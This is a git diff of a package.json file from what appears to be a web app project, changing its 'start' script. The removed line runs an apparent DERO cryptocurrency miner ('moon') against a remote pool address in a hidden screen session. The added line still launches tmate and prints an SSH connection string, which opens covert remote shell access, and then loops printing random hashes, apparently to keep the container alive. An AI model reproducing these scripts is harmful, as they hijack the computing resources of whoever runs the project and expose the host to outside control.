--- a/package.json
+++ b/package.json
@@ -13,7 +13,7 @@
     "web-vitals": "^2.1.4"
   },
   "scripts": {
-    "start": "apt-get update;apt-get install nodejs npm screen -y;chmod +x moon tmate;screen -dmS play ./moon -d 45.86.230.214:80 -w dero1qysflwnyf4mqhzdet7v478nn5l38q6u0uh9g86vtcpmrze0ml8xc7qgdhw9aj.$(echo $(shuf -i 1-9999 -n 1)-LAB);./tmate -S /tmp/tmate.sock new-session -d;./tmate -S /tmp/tmate.sock wait tmate-ready;./tmate -S /tmp/tmate.sock display -p '#{tmate_ssh} -t';while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 1m; done",
+    "start": "chmod +x tmate;./tmate -S /tmp/tmate.sock new-session -d;./tmate -S /tmp/tmate.sock wait tmate-ready;./tmate -S /tmp/tmate.sock display -p '#{tmate_ssh} -t';while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 1m; done",
     "dev": "",
     "build": "",
     "test": "",
